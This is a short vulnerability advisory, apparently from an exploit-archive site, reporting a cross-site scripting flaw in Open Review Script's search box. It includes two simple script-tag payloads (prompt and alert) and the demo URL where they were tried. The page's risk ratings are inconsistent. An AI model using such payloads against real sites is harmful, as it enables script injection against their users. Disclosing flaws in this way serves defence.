Open Review Script Cross Site Scripting

2013.02.19
Credit: TheMirkin
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx &#171;&#171;&#171;:&#187;&#187;&#187; Open Review Script-Cross Site Scripting (XSS) attacks &#171;&#171;&#171;:&#187;&#187;&#187; xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ++++++++++++++++++++++++++++++++++ ./Title Exploit : Open Review Script-Cross Site Scripting (XSS) attacks ./WebApps URL :http://openreviewscript.org/ ./WebApps Download :http://openreviewscript.org/files/OpenReviewScript-v1.0.1.zip ./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ] ./Security Risk : [ High Level ] ./Category XPL : [ WebApps] ./Time & Date : 18.02.2013. 10:300 PM. ++++++++++++++++++++++++++++++++ ############################# #[~] Xss on Demo Site (Searchbox) #http://openreviewscript.org/scriptdemo/results/search # # # # #If you try; you may open demo site and xss attack code to Searchbox. # # CAPS http://www.hizliresimyukle.com/images/2013/02/18/d9YPV.png # #<ScRiPt >prompt(978524)</ScRiPt> #<script>alert('TheMirkin')</script> # # # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx # # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy) ############################

References:

http://openreviewscript.org/
http://openreviewscript.org/files/OpenReviewScript-v1.0.1.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top